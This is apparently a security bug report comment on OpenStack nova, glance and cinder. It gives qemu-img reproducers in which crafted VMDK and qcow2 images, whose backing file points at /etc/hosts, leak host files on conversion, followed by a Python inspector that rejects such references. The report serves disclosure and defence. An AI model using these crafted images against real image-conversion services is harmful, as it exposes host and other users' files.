Here's a reproducer of the underlying operation without the need for any nova or glance:
qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
sed -i 's#leak-flat.vmdk#/etc/hosts#' leak.vmdk
qemu-img convert -f vmdk -O raw leak.vmdk leak.raw
head -n1 leak.raw
Note that I can repro the behavior with qemu-img using qcow2 as well:
qemu-img create -f qcow2 -F raw -b /etc/hosts leak.qcow 1M
qemu-img convert -O raw leak.qcow leak2.raw
head -n1 leak2.raw
Which means even people that don't use vmdk can't just ban that format to work around this, I suspect.
This helps quantify what I think is going on here under the covers so we can determine which other projects are affected. Glance does effectively the above commands if image conversion is enabled, so I suspect it is affected without needing nova at all, if and when image conversion is in use. I'll have to check.
Not sure about cinder, but I suspect if it can lay down a COW-based image on a volume in raw format, it too is probably affected.
I'm guessing that maybe we'll need to come up with some difficult rules about backing file locations and inspect/reject based on those. I would say that nova requiring that backing files are in /var/lib/nova would be enough, but that wouldn't prevent me from snooping someone else's image if I could determine their UUID.
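One way to do the "inspect/reject" step mentioned above is to read the backing reference out of the image header or descriptor yourself before handing the file to qemu-img. The following is an added example, not code from this bug report or from nova/glance/cinder; the rejection rule it applies (no backing file at all for qcow2, only bare file names for VMDK extents) and the sample header and descriptor are assumptions of the example, constructed to mirror the two reproducers.

```python
import re
import struct

QCOW2_MAGIC = b"QFI\xfb"
QCOW2_HEADER_LEN = 72  # fixed part of a version-2 qcow2 header
VMDK_EXTENT_RE = re.compile(r'^(?:RW|RDONLY|NOACCESS)\s+\d+\s+\w+\s+"([^"]+)"', re.M)

def qcow2_backing_file(data: bytes):
    """Return the backing file name stored in a qcow2 header, or None."""
    if len(data) < QCOW2_HEADER_LEN or data[:4] != QCOW2_MAGIC:
        raise ValueError("not a qcow2 image")
    # bytes 8..16: backing_file_offset (u64), bytes 16..20: backing_file_size (u32)
    offset, size = struct.unpack(">QI", data[8:20])
    if size == 0:
        return None
    if offset + size > len(data):
        raise ValueError("backing file name lies outside the image")
    return data[offset:offset + size].decode("utf-8", "replace")

def vmdk_extent_files(descriptor: str):
    """Return the extent file names referenced by a VMDK descriptor."""
    return VMDK_EXTENT_RE.findall(descriptor)

def unsafe_references(fmt: str, data: bytes):
    """References a conversion service should reject before it runs qemu-img.

    Rule assumed by this example: an uploaded qcow2 may not name a backing file
    at all, and VMDK extents must be bare file names next to the descriptor.
    """
    if fmt == "qcow2":
        backing = qcow2_backing_file(data)
        return [] if backing is None else [backing]
    if fmt == "vmdk":
        return [f for f in vmdk_extent_files(data.decode("utf-8", "replace"))
                if "/" in f or "\\" in f or f.startswith(".")]
    raise ValueError(f"unsupported format {fmt!r}")

def build_qcow2(backing: bytes) -> bytes:
    """Constructed sample: minimal v2 header with the backing name placed right after it."""
    offset = QCOW2_HEADER_LEN if backing else 0
    head = QCOW2_MAGIC + struct.pack(">IQI", 2, offset, len(backing))
    return head + b"\x00" * (QCOW2_HEADER_LEN - len(head)) + backing

LEAKY_QCOW2 = build_qcow2(b"/etc/hosts")  # what `-b /etc/hosts` above records
LEAKY_VMDK = ('# Disk DescriptorFile\nversion=1\ncreateType="monolithicFlat"\n'
              'RW 2048 FLAT "/etc/hosts" 0\n')  # descriptor after the sed above
```

A real inspector must also bound how much of the upload it reads and handle qcow2 v3 and the other VMDK subformats; this covers only the two cases reproduced above.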